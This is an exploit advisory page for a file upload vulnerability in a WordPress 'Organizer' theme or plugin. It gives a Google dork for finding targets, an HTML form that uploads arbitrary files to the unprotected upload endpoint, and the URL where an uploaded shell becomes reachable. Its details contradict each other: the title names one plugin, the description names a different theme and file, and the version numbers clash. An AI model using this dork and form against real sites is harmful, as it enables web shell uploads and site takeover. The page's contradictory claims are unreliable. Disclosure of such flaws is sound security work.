Wordpress Plugin Organizer File 6.x Upload Vulnerability

Published
Credit
Risk
2017.05.10
sohaip-hackerDZ
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: inurl:/themes/organizer

<!--
* Exploit Title: Wordpress Plugin Organizer File Upload Vulnerability 6.x
* Discovery Date: 2017-05-09
* Public Disclosure Date:2017-05-09
* Vendor Homepage: http://www.tools-hack.com
* Exploit Author: sohaip-hackerDZ
* forum http://www.spyhackerz.com/forum/
* Contact: https://www.facebook.com/sohaipbarika
* Version: 8.1 (may affect newer versions but this was all I had)
* Tested on: Wordpress 4.2.x-4.7.x

Description
================================================================================
The Beauty Premium theme contains a contact form that is vulnerable to CSRF
and File Upload vulnerability in the sendmail.php file. The file attachment
gets uploaded to the wordpress upload directory and it is not sanitized,
allowing attackers to upload harmful code.


PoC
================================================================================
Google Dork inurl:/themes/organizer or detect via WPScan:
-->

<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/organizer/lib_upload/server/php/" method="post">
select fuile: <input name="files[]" type="file" /><br />
<input type="submit" value="submit!" />
</form>
</body>
</html>
<!--

File will be visible:

http://127.0.0.1/wp-content/themes/organizer/lib_upload/server/php/files/shell.jpg

You will receive a 404 error after posting, but navigate to the sites upload directory and access your uploaded file directly.

Update to version 8.1
8.1
https://downloads.wordpress.org/plugin/plugin-organizer.8.1.zip
-->


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com